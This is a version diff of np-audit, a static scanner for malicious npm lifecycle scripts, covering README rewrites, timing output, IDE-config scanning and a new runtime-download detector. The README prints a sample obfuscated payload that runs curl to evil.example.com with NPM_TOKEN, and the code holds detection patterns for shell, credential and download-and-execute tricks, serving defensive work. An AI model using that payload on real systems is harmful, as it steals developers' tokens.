np-audit 2.0.0 → 2.2.0

package/README.md

@@ -5,101 +5,82 @@
 [![npm package size](https://img.shields.io/npm/unpacked-size/np-audit)](https://www.npmjs.com/package/np-audit)
 [![GitHub license](https://img.shields.io/github/license/KoblerS/np-audit.svg)](https://github.com/KoblerS/np-audit/blob/main/LICENSE)
 [![CI](https://github.com/KoblerS/np-audit/actions/workflows/ci.yml/badge.svg)](https://github.com/KoblerS/np-audit/actions/workflows/ci.yml)
+[![codecov](https://codecov.io/gh/KoblerS/np-audit/branch/main/graph/badge.svg)](https://codecov.io/gh/KoblerS/np-audit)
 
 # np-audit — npm package auditor
 
 Static security analysis for npm packages — detects obfuscated lifecycle scripts, known vulnerabilities, and malicious patterns **before** they run. Drop-in replacement for `npm install` and `npm ci`.
 
-**Zero dependencies.** Pure Node.js built-ins only.
+**Zero dependencies.** Pure Node.js built-ins only. **< 100 kB** on the wire.
 
----
+```bash
+npx np-audit scan express
+```
 
-## The Attack Vector
+```bash
+npm install -g np-audit
+npa scan                     # scan all deps
+npa install                  # audit then install
+alias npm='npa'              # use as drop-in replacement
+```
 
-Supply chain attacks targeting the npm ecosystem frequently abuse lifecycle scripts. When you run `npm install`, npm automatically executes any `preinstall`, `install`, or `postinstall` script defined in a package's `package.json`. Attackers ship packages that look legitimate but embed malicious payloads hidden behind obfuscation techniques:
+---
 
-```json
-{
-  "scripts": {
-    "postinstall": "node ./dist/install.js"
-  }
-}
-```
+## Marshallers
 
-Where `dist/install.js` contains something like:
+Detection is split into modular marshallers — each one detects a single attack signal:
 
-```js
-// Obfuscated — hard to read by design
-var _0x3f2a = ['\x72\x65\x71\x75\x69\x72\x65', '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'];
-eval(String.fromCharCode(114,101,113,117,105,114,101)+'(\'child_process\').exec(\'curl -s http://evil.example.com/\'+process.env.NPM_TOKEN)');
-```
+| Marshaller | What it detects | Score |
+| ---------- | --------------- | ----- |
+| `eval/dynamic-exec` | `eval()`, `new Function()`, indirect eval, `vm.*`, `setTimeout` with string | 8 |
+| `obfuscator.io` | `_0x` variable naming patterns (obfuscator.io output) | 9–80 |
+| `high-entropy-string` | Long strings or concatenation chains with high Shannon entropy | 6 |
+| `hex-escape-density` | Dense `\xNN` and `\uXXXX` escape sequences | 5–50 |
+| `fromCharCode` | `String.fromCharCode` with many args, large decimal char-code arrays | 7 |
+| `encoded-decode` | Base64/hex decode (`atob`, `Buffer.from`) optionally combined with `eval` | 3–8 |
+| `child-process` | `require('child_process')`, `exec`, `spawn`, `fork`, worker_threads | 5 |
+| `hex-array` | Large numbers of `0x` hex literal values | 7–60 |
+| `process-env` | `process.env` access (credential exfiltration signal) | 3 |
+| `network-call` | `require('https')`, `fetch()`, `dns`, `net`, `tls` | 4 |
+| `filesystem-manipulation` | `fs.writeFile`, `chmod`, `symlink` (backdoor persistence) | 3–4 |
+| `runtime-download` | Downloads and executes external runtimes (Bun, Deno) | 9–50 |
+| `vscode-autorun` | VS Code tasks with `runOn: folderOpen` (auto-execution) | 30 |
+| `known-vulnerability` | Known CVEs via Snyk API or OSV.dev | 4–6 (WARN), 80 (malicious) |
+
+Scores scale with severity — higher counts of obfuscation indicators produce higher scores. The final verdict is based on the highest individual score across all marshallers.
 
-Real-world examples include:
-
-- **[event-stream (2018)](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident)** — malicious postinstall that stole Bitcoin wallet credentials
-- **[ua-parser-js (2021)](https://github.com/advisories/GHSA-pjwm-rvh2-c87w)** — cryptocurrency miner + info-stealer injected via hijacked maintainer account
-- **[node-ipc (2022)](https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package-vulnerability/)** — wiper malware targeting systems by geo-IP
-- **[colors / faker (2022)](https://snyk.io/blog/open-source-npm-packages-colors-faker/)** — deliberate sabotage by the maintainer via postinstall
-- **[SAP CAP / cds-dbs (2025)](https://community.sap.com/t5/technology-blog-posts-by-sap/cap-developers-call-to-action-to-mitigate-and-apply-solution-provided-in/ba-p/14387683)** — compromised npm package targeting SAP developers
-
-**`npa` never executes the scripts.** It downloads and statically analyzes them, detecting:
-
-| Signal                         | Example                                    |
-| ------------------------------ | ------------------------------------------ |
-| `eval()` / `new Function()`    | `eval(atob("aGVsbG8="))`                   |
-| Indirect eval                  | `(0, eval)(x)`, `globalThis['ev'+'al'](x)` |
-| Function constructor prototype | `({}).constructor.constructor("…")()`      |
-| `setTimeout` with string arg   | `setTimeout('alert(1)', 100)`              |
-| Obfuscator.io patterns         | `var _0x3f2a = [...]`                      |
-| High-entropy strings           | Encrypted/compressed payloads              |
-| Split-literal high entropy     | `'aB' + 'cD' + 'eF' + …` (concat chain)    |
-| Hex / Unicode escape density   | `\x68\x65\x6c\x6c\x6f`, `\u0068\u0065…`    |
-| `String.fromCharCode()` chains | `String.fromCharCode(104,101,108,108,111)` |
-| Decimal char-code arrays       | `[101,118,97,108,...]` (printable ASCII)   |
-| Base64 / hex decode + exec     | `Buffer.from(x,'base64'\|'hex')` + `eval`  |
-| Shell spawning                 | `require('child_process').exec(...)`       |
-| `worker_threads`               | `new Worker(...)`, eval-class surface      |
-| Concealed `require`            | `require('child' + '_process')`            |
-| Dynamic `require` / `import`   | `require(variable)`, `import(expr)`        |
-| Large hex literal arrays       | `[0x1a, 0x2b, 0x3c, ...]` × 20+            |
-| `process.env` access           | Token/credential harvesting                |
-| Outbound network calls         | `https`/`http`/`net`/`dns`/`tls`/`dgram`/`http2`, `node:` prefix, dynamic `import()` |
-| Missing referenced script      | Command references file not in tarball     |
-| Oversized require graph        | Postinstall reaches >50 files or >5 MB     |
-
-### Coverage beyond the entry script
-
-`npa` doesn't just inspect the single file named in the lifecycle command. It:
-
-- Splits chained commands (`&&`, `||`, `;`, `|`) and analyses each segment, so `node setup.js && node payload.js` no longer hides the second invocation.
-- Handles `node -e "…"`, `sh -c "…"`, `python -c "…"` by analysing the inline code rather than just the wrapper command.
-- Reads shell scripts (`sh ./install.sh`), Python scripts, and shebang-invoked files — not only `node` targets.
-- Follows internal `require('./…')` and `import './…'` chains across the package (with cycle detection and per-package caps), so payloads hidden in helper files like `lib/helper.js` are caught.
-- Records dynamic `require(variable)` / `import(expr)` calls as findings, since they can't be resolved statically.
-- Scans the project's **own** `package.json` lifecycle scripts by default, catching PRs and supply-chain attacks that target the repository itself. Opt out with `scanSelf: false` in `.npmauditor.json`.
-- Inspects **all** lifecycle scripts npm may run, not only `preinstall`/`install`/`postinstall`: also `prepare`, `preprepare`, `postprepare`, and `prepublish`.
+See [CONTRIBUTING.md](CONTRIBUTING.md) for how to write custom marshallers.
 
 ---
 
-## Install
+## Vulnerability Scanning (CVE)
 
-**Global install (recommended):**
+Every scanned package is checked against known vulnerability databases alongside the code analysis.
 
-```bash
-npm install -g np-audit
-```
+**Default: OSV.dev (no setup required)**
 
-**Or use directly with npx:**
+Works out of the box — queries the free [OSV.dev](https://osv.dev/) API for known vulnerabilities and malicious package advisories.
+
+**Optional: Snyk API (richer data)**
 
 ```bash
-npx np-audit scan
+# Environment variable
+export SNYK_API_TOKEN=your-token-here
+
+# Or via Snyk CLI
+snyk auth
 ```
 
-After global install, use the `npa` command:
+Token resolution order: `SNYK_API_TOKEN` → `SNYK_TOKEN` → `~/.config/configstore/snyk.json`
 
-```bash
-npa --version
-```
+| Severity | Score | Verdict |
+| -------- | ----- | ------- |
+| Malicious package | 80 | DANGER |
+| 10+ vulnerabilities | 6 | WARN |
+| 5–9 vulnerabilities | 5 | WARN |
+| 1–4 vulnerabilities | 4 | WARN |
+
+Non-malicious CVEs produce warnings but never block installation. Only confirmed malicious packages trigger DANGER.
 
 ---
 
@@ -111,14 +92,13 @@ npa --version
 | ------------------------------ | ----------- | ---------------------------------- |
 | `npa install [package]`        | `npa i`     | Audit then run `npm install`       |
 | `npa ci`                       | —           | Audit then run `npm ci`            |
-| `npa scan`                     | `npa s`     | Scan only, no install              |
+| `npa scan [package]`           | `npa s`     | Scan only, no install              |
 | `npa config get`               | `npa c get` | Show current configuration         |
 | `npa config set <key> <value>` | `npa c set` | Update a config value              |
-| `npa alias`                    | —           | Print shell hook for auto-scanning |
-| `npa alias --install`          | —           | Install hook to shell profile      |
-| `npa alias --uninstall`        | —           | Remove hook from shell profile     |
+| `npa alias --install`          | —           | Install shell alias                |
+| `npa alias --uninstall`        | —           | Remove shell alias                 |
 
-Use `npa <command> -h` for detailed help on any command.
+Any unrecognized command is forwarded to npm (e.g. `npa run test`, `npa publish`).
 
 ### Flags
 
@@ -128,41 +108,13 @@ Use `npa <command> -h` for detailed help on any command.
 | `--json`    | —     | `install`, `ci`, `scan` | Machine-readable JSON output                     |
 | `--no-dev`  | —     | `install`, `ci`, `scan` | Skip devDependencies                             |
 | `--verbose` | —     | all                     | Show fetch progress and extra detail             |
-| `--version` | —     | —                       | Print version and exit                           |
+| `--version` | `-v`  | —                       | Print version and exit                           |
 | `--help`    | `-h`  | —                       | Print help and exit                              |
 
-### Drop-in replacement for `npm install`
-
-```bash
-# Audit all dependencies, then install if clean
-npa install          # or: npa i
-
-# Audit a specific package before adding it
-npa i express
-```
-
-### Drop-in replacement for `npm ci`
-
-```bash
-npa ci
-```
-
-### Scan only (no install)
-
-```bash
-npa scan             # or: npa s
-npa s --json         # machine-readable output
-npa s --no-dev       # skip devDependencies
-npa s --verbose      # show fetch progress
-```
-
 ### Interactive `--review` mode
 
-Review each install script yourself and decide which to allow:
-
 ```bash
-npa i --review        # or: npa i -r
-npa ci --review
+npa install --review
 ```
 
 ```
@@ -178,169 +130,94 @@ npa ci --review
   2 allowed  1 denied
 ```
 
-After confirmation, `npa` runs `npm install --ignore-scripts` and then manually executes only the scripts you allowed.
-
-### Configuration
-
-```bash
-# Show current config
-npa config get
-
-# Change thresholds
-npa config set blockScore 6    # block at score 6+ (default: 7)
-npa config set warnScore 3     # warn at score 3+ (default: 4)
-
-# Skip trusted packages or scopes
-npa config set skipPackages '["esbuild","puppeteer"]'
-npa config set skipScopes '["@types","@babel"]'
-```
-
-Config is stored in `~/.npmauditor.json` (global) and can be overridden per project with `.npmauditor.json` in your project root.
-
-### Shell Hook (npm alias)
-
-Automatically run `npa scan` before every `npm install` or `npm ci`:
-
-```bash
-# Install the hook to your shell profile (~/.zshrc or ~/.bashrc)
-npa alias --install
-
-# Reload your shell
-source ~/.zshrc  # or ~/.bashrc
-```
-
-Now when you run `npm install` or `npm ci`, npa will scan first:
-
-```bash
-$ npm install lodash
-[npa] Scanning dependencies before npm install...
-✔ No packages with install scripts found.
-[npa] Scan passed. Running npm install...
-```
-
-If issues are found, the install is blocked:
+---
 
-```bash
-$ npm install evil-pkg
-[npa] Scanning dependencies before npm install...
-✗ evil-pkg@1.0.0 DANGER (score: 9)
-[npa] Scan found issues. Run 'npa install --review' for interactive mode.
-```
+## Configuration
 
-To remove the hook:
+Config is stored in `~/.npmauditor.json` (global) and can be overridden per project with `.npmauditor.json`.
 
 ```bash
-npa alias --uninstall
+npa config get                              # Show current config
+npa config set blockScore 6                 # Block at score 6+
+npa config set skipPackages '["esbuild"]'   # Trust specific packages
+npa config set skipScopes '["@types"]'      # Trust entire scopes
 ```
 
-#### All config keys
+### All config keys
 
 | Key               | Default                      | Description                             |
 | ----------------- | ---------------------------- | --------------------------------------- |
-| `blockScore`      | `7`                          | Score threshold for hard block (exit 1) |
-| `warnScore`       | `4`                          | Score threshold for warning (exit 0)    |
+| `blockScore`      | `7`                          | Score threshold for DANGER (exit 1)     |
+| `warnScore`       | `4`                          | Score threshold for WARN (exit 0)       |
 | `registry`        | `https://registry.npmjs.org` | npm registry URL                        |
 | `timeout`         | `30000`                      | HTTP request timeout (ms)               |
-| `parallelFetches` | `5`                          | Concurrent tarball downloads            |
-| `skipScopes`      | `[]`                         | `@scope` prefixes to skip entirely      |
-| `skipPackages`    | `[]`                         | Specific package names to skip          |
+| `parallelFetches` | `5`                          | Concurrent downloads                    |
+| `skipScopes`      | `[]`                         | `@scope` prefixes to skip               |
+| `skipPackages`    | `[]`                         | Package names to skip                   |
 | `silent`          | `false`                      | Suppress output when no issues found    |
-| `scanSelf`        | `true`                       | Also scan the current project's own `package.json` lifecycle scripts |
-| `maxTarballSize`  | `50MB`                       | Max unpacked tarball size (zip bomb protection) |
-| `checkVulnerabilities` | `true`                  | Check packages against known vulnerability databases |
-| `deepResolve`     | `false`                      | Recursively resolve full transitive dependency tree |
+| `scanSelf`        | `true`                       | Scan own project lifecycle scripts      |
+| `maxTarballSize`  | `50MB`                       | Max unpacked tarball size (bomb protection) |
+| `checkVulnerabilities` | `true`                  | Check packages against CVE databases    |
+| `deepResolve`     | `false`                      | Resolve full transitive dependency tree |
 
 ---
 
-### Vulnerability Scanning (CVE)
+## Shell Alias
 
-np-audit checks every scanned package against known vulnerability databases. This runs alongside the obfuscation detection and flags packages with known CVEs.
-
-**Default: OSV.dev (no setup required)**
-
-Works out of the box — queries the free [OSV.dev](https://osv.dev/) API for known vulnerabilities and malicious package advisories.
-
-**Optional: Snyk API (richer data)**
-
-For more detailed vulnerability information, configure a Snyk API token:
+Use npa as a transparent npm replacement:
 
 ```bash
-# Option 1: Environment variable
-export SNYK_API_TOKEN=your-token-here
-
-# Option 2: Snyk CLI config (if you have Snyk CLI installed)
-snyk auth
+npa alias --install     # adds: alias npm='npa'
+source ~/.zshrc         # reload shell
 ```
 
-np-audit checks for the token in this order:
-1. `SNYK_API_TOKEN` environment variable
-2. `SNYK_TOKEN` environment variable
-3. `~/.config/configstore/snyk.json` (created by `snyk auth`)
-
-**Scoring:**
-| Severity | Score | Verdict |
-| -------- | ----- | ------- |
-| Malicious package | 80 | DANGER |
-| 10+ vulnerabilities | 6 | WARN |
-| 5-9 vulnerabilities | 5 | WARN |
-| 1-4 vulnerabilities | 4 | WARN |
-
-Non-malicious CVEs produce warnings but never block installation. Only confirmed malicious packages trigger DANGER.
-
-**Disable vulnerability checks:**
+Now `npm install`, `npm ci` scan automatically. All other npm commands (`npm run`, `npm test`, `npm publish`) pass through unchanged.
 
 ```bash
-npa config set checkVulnerabilities false
+npa alias --uninstall   # remove the alias
 ```
 
 ---
 
-## Exit codes
+## How It Works
 
-| Code | Meaning                             |
-| ---- | ----------------------------------- |
-| `0`  | All packages clean or only warnings |
-| `1`  | One or more packages blocked        |
+1. **Parse** `package-lock.json` (v1/v2/v3) or resolve from `package.json`
+2. **Fetch** tarballs from registry (or read from `node_modules`)
+3. **Parse** lifecycle commands — splits `&&`/`||`/`;`/`|`, handles `node -e`, `sh -c`, shell scripts
+4. **Walk** the `require()`/`import` graph from each entry (cycle detection, 50 file / 5 MB cap)
+5. **Analyze** with all marshallers — static code checks + CVE database queries
+6. **Score** and classify: DANGER / WARN / OK
+7. **Report** or proceed with install
 
 ---
 
-## How it works
+## The Attack Vector
 
-1. **Parse** `package-lock.json` (supports v1, v2, v3 formats)
-2. **Filter** packages: skip dev deps (`--no-dev`), skipped scopes/packages, packages without install scripts
-3. **Fetch or read** — for packages in `node_modules`: read from disk. For packages not yet installed: download the tarball from the npm registry and parse it in memory (pure Node.js tar.gz reader, no `tar` package)
-4. **Parse the lifecycle command** — split on `&&` / `||` / `;` / `|`, classify each segment by interpreter (`node`, `sh`, `python`, `bun`, …), and treat `node -e` / `sh -c` arguments as inline code
-5. **Walk the require/import graph** from each entry script — following internal `./` / `../` paths, with cycle detection and per-package caps (50 files / 5 MB)
-6. **Analyze** every reached file statically across all lifecycle scripts (`preinstall`, `install`, `postinstall`, `prepare`, `preprepare`, `postprepare`, `prepublish`) — never execute
-7. **Also scan the current project's own** `package.json` lifecycle scripts (unless `scanSelf: false`)
-8. **Score** findings (0–10 per signal), classify as DANGER / WARN / OK based on config thresholds
-9. **Report** results to terminal or `--json` — each finding is tagged with the file it came from
-10. **Proceed** — run npm normally, or in `--review` mode let you selectively allow scripts
+Supply chain attacks abuse npm lifecycle scripts. When you run `npm install`, any `preinstall`/`install`/`postinstall` script runs automatically. Attackers hide payloads behind obfuscation:
 
----
+```js
+var _0x3f2a = ['\x72\x65\x71\x75\x69\x72\x65', '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'];
+eval(String.fromCharCode(114,101,113,117,105,114,101)+'(\'child_process\').exec(\'curl http://evil.example.com/\'+process.env.NPM_TOKEN)');
+```
 
-## Marshallers
+Real-world incidents:
 
-Detection is split into modular marshallers — each one detects a single attack signal:
+- **[event-stream (2018)](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident)** — Bitcoin wallet credential theft
+- **[ua-parser-js (2021)](https://github.com/advisories/GHSA-pjwm-rvh2-c87w)** — crypto miner + info-stealer
+- **[node-ipc (2022)](https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package-vulnerability/)** — geo-targeted wiper malware
+- **[colors / faker (2022)](https://snyk.io/blog/open-source-npm-packages-colors-faker/)** — maintainer sabotage
+- **[SAP CAP / cds-dbs (2025)](https://community.sap.com/t5/technology-blog-posts-by-sap/cap-developers-call-to-action-to-mitigate-and-apply-solution-provided-in/ba-p/14387683)** — compromised package targeting enterprise developers
 
-| Marshaller | What it detects | Score |
-| ---------- | --------------- | ----- |
-| `eval/dynamic-exec` | `eval()`, `new Function()`, indirect eval, `vm.*`, `setTimeout` with string | 8 |
-| `obfuscator.io` | `_0x` variable naming patterns (obfuscator.io output) | 9–80 |
-| `high-entropy-string` | Long strings or concatenation chains with high Shannon entropy | 6 |
-| `hex-escape-density` | Dense `\xNN` and `\uXXXX` escape sequences | 5–50 |
-| `fromCharCode` | `String.fromCharCode` with many args, large decimal char-code arrays | 7 |
-| `encoded-decode` | Base64/hex decode (`atob`, `Buffer.from`) optionally combined with `eval` | 3–8 |
-| `child-process` | `require('child_process')`, `exec`, `spawn`, `fork`, worker_threads | 5 |
-| `hex-array` | Large numbers of `0x` hex literal values | 7–60 |
-| `process-env` | `process.env` access (credential exfiltration signal) | 3 |
-| `network-call` | `require('https')`, `fetch()`, `dns`, `net`, `tls` | 4 |
-| `filesystem-manipulation` | `fs.writeFile`, `chmod`, `symlink` (backdoor persistence) | 3–4 |
-| `known-vulnerability` | Known CVEs via Snyk API or OSV.dev | 4–6 (WARN), 80 (malicious) |
+`npa` **never executes** scripts. It downloads and statically analyzes them.
 
-Scores scale with severity — higher counts of obfuscation indicators produce higher scores. The final verdict is based on the highest individual score across all marshallers.
+---
 
-See [CONTRIBUTING.md](CONTRIBUTING.md) for the marshaller architecture and how to write custom ones.
+## Exit Codes
+
+| Code | Meaning                             |
+| ---- | ----------------------------------- |
+| `0`  | All clean or only warnings          |
+| `1`  | One or more packages blocked        |
 
 ---
 

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "np-audit",
-  "version": "2.0.0",
+  "version": "2.2.0",
   "description": "Static obfuscation detector for npm lifecycle scripts — supply chain attack prevention",
   "bin": {
     "npa": "bin/npa.js",
@@ -13,7 +13,8 @@
     "README.md"
   ],
   "scripts": {
-    "test": "node test/index.js"
+    "test": "node test/index.js",
+    "coverage": "npx c8@11.0.0 --reporter=lcov --reporter=text-summary node test/index.js"
   },
   "engines": {
     "node": ">=18.0.0"
@@ -32,5 +33,8 @@
   "repository": {
     "type": "git",
     "url": "git+https://github.com/KoblerS/np-audit.git"
+  },
+  "dependencies": {
+    "c8": "^11.0.0"
   }
 }

package/src/commands/ci.js

@@ -32,7 +32,9 @@ module.exports = {
   async run({ flags, config, cwd }) {
     const spinner = !flags.json && !config.silent ? output.createSpinner('Auditing packages...') : null;
     if (spinner) spinner.start();
+    const t0 = Date.now();
     const results = await scan({ cwd, config, noDev: flags.noDev, verbose: flags.verbose });
+    const elapsedMs = Date.now() - t0;
     if (spinner) spinner.stop();
     const hasIssues = results.some(r => r.verdict !== 'OK');
     const silent = config.silent && !hasIssues;
@@ -43,6 +45,7 @@ module.exports = {
       process.stdout.write(JSON.stringify(toJsonReport(results), null, 2) + '\n');
     } else {
       printResults(results, silent);
+      if (!silent) output.printSummary(results, elapsedMs);
     }
 
     const blocked = results.filter(r => r.verdict === 'BLOCK');

package/src/commands/install.js

@@ -35,6 +35,7 @@ module.exports = {
 
     const spinner = !flags.json && !config.silent ? output.createSpinner('Auditing packages...') : null;
     if (spinner) spinner.start();
+    const t0 = Date.now();
     const results = await scan({
       cwd,
       config,
@@ -42,6 +43,7 @@ module.exports = {
       verbose:       flags.verbose,
       packages:      packages.length > 0 ? packages : null,
     });
+    const elapsedMs = Date.now() - t0;
     if (spinner) spinner.stop();
 
     const hasIssues = results.some(r => r.verdict !== 'OK');
@@ -53,6 +55,7 @@ module.exports = {
       process.stdout.write(JSON.stringify(toJsonReport(results), null, 2) + '\n');
     } else {
       printResults(results, silent);
+      if (!silent) output.printSummary(results, elapsedMs);
     }
 
     const blocked = results.filter(r => r.verdict === 'BLOCK');

package/src/commands/scan.js

@@ -33,7 +33,9 @@ module.exports = {
     const packages = args.filter(a => !a.startsWith('-'));
     const spinner = !flags.json && !config.silent ? output.createSpinner('Auditing packages...') : null;
     if (spinner) spinner.start();
+    const t0 = Date.now();
     const results = await scan({ cwd, config, noDev: flags.noDev, verbose: flags.verbose, packages: packages.length > 0 ? packages : null });
+    const elapsedMs = Date.now() - t0;
     if (spinner) spinner.stop();
     const hasIssues = results.some(r => r.verdict !== 'OK');
     const silent = config.silent && !hasIssues;
@@ -47,7 +49,7 @@ module.exports = {
     }
 
     printResults(results, silent);
-    if (!silent) output.printSummary(results);
+    if (!silent) output.printSummary(results, elapsedMs);
 
     const hasBlock = results.some(r => r.verdict === 'BLOCK');
     process.exit(hasBlock ? 1 : 0);

package/src/core/detector.js

@@ -344,20 +344,6 @@ function checkFilesystemManipulation(code) {
 
 // ─── Main detection function ─────────────────────────────────────────────────
 
-const CHECKS = [
-  checkEval,
-  checkObfuscatorIo,
-  checkHighEntropy,
-  checkHexEscapes,
-  checkFromCharCode,
-  checkBase64Exec,
-  checkChildProcess,
-  checkHexArray,
-  checkProcessEnv,
-  checkNetworkCalls,
-  checkFilesystemManipulation,
-];
-
 /**
  * Run all checks against a code string.
  * For large files, uses a sliding window (50% overlap) so payloads cannot
@@ -389,8 +375,12 @@ function detectObfuscation(code, config = { blockScore: 50, warnScore: 20 }) {
 
   const allFindings = new Map(); // Dedupe by name, keep highest score
 
+  // Combine inline checks with marshaller registry
+  const { getStaticMarshallers } = require('../marshallers');
+  const allChecks = getStaticMarshallers().map(m => m.check.bind(m));
+
   for (const chunk of chunks) {
-    for (const check of CHECKS) {
+    for (const check of allChecks) {
       const result = check(chunk);
       if (result) {
         const existing = allFindings.get(result.name);

package/src/core/scanner.js

@@ -145,7 +145,11 @@ async function scan(opts) {
     if (selfResult) scanned.unshift(selfResult);
   }
 
-  scanned.totalPackages = allPackages.length;
+  // Scan IDE/tool config files that can auto-execute code
+  const ideResults = scanIdeConfigs(cwd, config);
+  scanned.push(...ideResults);
+
+  scanned.totalPackages = allPackages.length + ideResults.length;
   return scanned;
 }
 
@@ -178,6 +182,78 @@ function scanCwdProject(cwd, config) {
   return analyzeScriptsLocalFromDir(pkg, pkgJson, cwd, config);
 }
 
+const IDE_CONFIG_FILES = [
+  '.vscode/tasks.json',
+  '.vscode/settings.json',
+  '.vscode/launch.json',
+  '.claude/settings.json',
+];
+
+function scanIdeConfigs(cwd, config) {
+  const results = [];
+
+  for (const relPath of IDE_CONFIG_FILES) {
+    const fullPath = path.join(cwd, relPath);
+    if (!fs.existsSync(fullPath)) continue;
+
+    let code;
+    try { code = fs.readFileSync(fullPath, 'utf8'); } catch { continue; }
+
+    const result = detectObfuscation(code, config);
+    if (result.score === 0) continue;
+
+    results.push({
+      pkg: { name: relPath, version: '', self: true },
+      scripts: [{ lifecycle: 'ide-config', file: relPath, code, ...result }],
+      score: result.score,
+      findings: result.findings,
+      verdict: result.verdict,
+    });
+
+    // Also scan any files referenced by commands in tasks.json
+    if (relPath.endsWith('tasks.json')) {
+      const referenced = extractReferencedScripts(code, cwd);
+      for (const { file, scriptCode } of referenced) {
+        const scriptResult = detectObfuscation(scriptCode, config);
+        if (scriptResult.score > 0) {
+          const existing = results.find(r => r.pkg.name === relPath);
+          if (existing) {
+            existing.scripts.push({ lifecycle: 'task-script', file, code: scriptCode, ...scriptResult });
+            existing.findings.push(...scriptResult.findings);
+            if (scriptResult.score > existing.score) {
+              existing.score = scriptResult.score;
+              existing.verdict = verdictFromScore(scriptResult.score, config);
+            }
+          }
+        }
+      }
+    }
+  }
+
+  return results;
+}
+
+function extractReferencedScripts(tasksJson, cwd) {
+  const scripts = [];
+  try {
+    const tasks = JSON.parse(tasksJson);
+    for (const task of tasks.tasks || []) {
+      if (!task.command) continue;
+      // Extract file paths from commands like "node .claude/setup.mjs"
+      const match = task.command.match(/(?:node|bun|deno|sh|bash|python)\s+([^\s]+)/);
+      if (match) {
+        const scriptPath = path.join(cwd, match[1]);
+        if (fs.existsSync(scriptPath)) {
+          try {
+            scripts.push({ file: match[1], scriptCode: fs.readFileSync(scriptPath, 'utf8') });
+          } catch {}
+        }
+      }
+    }
+  } catch {}
+  return scripts;
+}
+
 /**
  * Analyze a package's lifecycle scripts using a directory root as the
  * filesystem base. Used for both node_modules packages and the CWD itself.
@@ -575,6 +651,17 @@ function extractSemver(range) {
   return null;
 }
 
+/**
+ * Resolve an extracted (possibly partial) version to a full version using registry metadata.
+ * Falls back to dist-tags.latest when the partial version doesn't match any published version.
+ */
+function resolveVersion(extracted, meta) {
+  if (meta.versions && meta.versions[extracted]) return extracted;
+  const latest = meta['dist-tags'] && meta['dist-tags'].latest;
+  if (latest && meta.versions && meta.versions[latest]) return latest;
+  return null;
+}
+
 /**
  * Resolve dependencies from package.json when no lockfile exists.
  * @param {string} cwd
@@ -611,12 +698,13 @@ async function resolveFromPackageJson(cwd, config, noDev) {
     try {
       const encodedName = name.startsWith('@') ? `@${encodeURIComponent(name.slice(1))}` : encodeURIComponent(name);
       const meta = await fetchJSON(`${config.registry}/${encodedName}`, { timeout: config.timeout });
-      const versionData = meta.versions && meta.versions[version];
-      if (!versionData) continue;
+      const resolvedVersion = resolveVersion(version, meta);
+      if (!resolvedVersion) continue;
+      const versionData = meta.versions[resolvedVersion];
 
       packages.push({
         name,
-        version,
+        version: resolvedVersion,
         resolved: versionData.dist && versionData.dist.tarball,
         integrity: versionData.dist && versionData.dist.integrity || '',
         hasInstallScript: !!(versionData.scripts &&
@@ -676,22 +764,25 @@ async function resolveSinglePackage(packageSpec, config) {
     for (const [depName] of queue) seen.add(depName);
 
     const resolutions = await mapWithConcurrency(queue, config.parallelFetches, async ([depName, range]) => {
-      const exactVersion = extractSemver(range);
-      if (!exactVersion) return null;
+      const extractedVersion = extractSemver(range);
+      if (!extractedVersion) return null;
 
       let depScripts = false;
       let depDeps = null;
-      let depTarball = buildTarballUrl(depName, exactVersion, config.registry);
+      let depTarball = buildTarballUrl(depName, extractedVersion, config.registry);
       let depIntegrity = '';
+      let resolvedDepVersion = extractedVersion;
 
       try {
         const encodedDep = depName.startsWith('@') ? `@${encodeURIComponent(depName.slice(1))}` : encodeURIComponent(depName);
         const depMeta = await fetchJSON(`${config.registry}/${encodedDep}`, { timeout: config.timeout });
-        const depData = depMeta.versions && depMeta.versions[exactVersion];
+        const fullVersion = resolveVersion(extractedVersion, depMeta);
+        const depData = fullVersion && depMeta.versions && depMeta.versions[fullVersion];
         if (depData) {
+          resolvedDepVersion = fullVersion;
           depScripts = !!(depData.scripts &&
             (depData.scripts.preinstall || depData.scripts.postinstall || depData.scripts.install));
-          depTarball = depData.dist && depData.dist.tarball || depTarball;
+          depTarball = depData.dist && depData.dist.tarball || buildTarballUrl(depName, fullVersion, config.registry);
           depIntegrity = depData.dist && depData.dist.integrity || '';
           depDeps = depData.dependencies;
         }
@@ -702,7 +793,7 @@ async function resolveSinglePackage(packageSpec, config) {
       return {
         pkg: {
           name:             depName,
-          version:          exactVersion,
+          version:          resolvedDepVersion,
           resolved:         depTarball,
           integrity:        depIntegrity,
           hasInstallScript: depScripts,
@@ -761,4 +852,4 @@ async function mapWithConcurrency(items, limit, fn) {
   return results;
 }
 
-module.exports = { scan, hasInstallScripts, extractScriptFileFromCommand, verdictFromScore };
+module.exports = { scan, hasInstallScripts, extractScriptFileFromCommand, verdictFromScore, resolveVersion, extractSemver };

package/src/marshallers/runtimeDownload.js

@@ -0,0 +1,73 @@
+'use strict';
+
+const { Marshaller } = require('./base');
+
+class RuntimeDownloadMarshaller extends Marshaller {
+  constructor() {
+    super('runtime-download', 'External runtime download and execution');
+  }
+
+  check(code) {
+    // Detect downloading external runtimes (common evasion: use Bun/Deno to bypass Node-based tools)
+    const runtimePatterns = [
+      /bun-(?:linux|darwin|windows)/i,
+      /oven-sh\/bun/i,
+      /deno\.land/i,
+      /denoland\/deno/i,
+      /BUN_VERSION/,
+      /DENO_VERSION/,
+      /bun\.exe/,
+      /deno\.exe/,
+    ];
+
+    // Detect execution of downloaded binaries
+    const execPatterns = [
+      /execFileSync\s*\(\s*\w*[Bb]un/,
+      /execFileSync\s*\(\s*\w*[Dd]eno/,
+      /execFile\s*\(\s*\w*[Bb]un/,
+      /execFile\s*\(\s*\w*[Dd]eno/,
+      /spawn\s*\(\s*\w*[Bb]un/,
+      /spawn\s*\(\s*\w*[Dd]eno/,
+      // Generic: download + chmod + exec pattern
+      /chmodSync\s*\([^)]*0o?755\)[\s\S]{0,500}execFileSync/,
+      /chmod[\s\S]{0,200}exec(?:File)?(?:Sync)?\s*\(/,
+    ];
+
+    // Detect download URLs for binaries combined with execution
+    const downloadExecPatterns = [
+      /https:\/\/github\.com\/[^/]+\/[^/]+\/releases\/download[\s\S]{0,1000}exec(?:File)?(?:Sync)?\s*\(/,
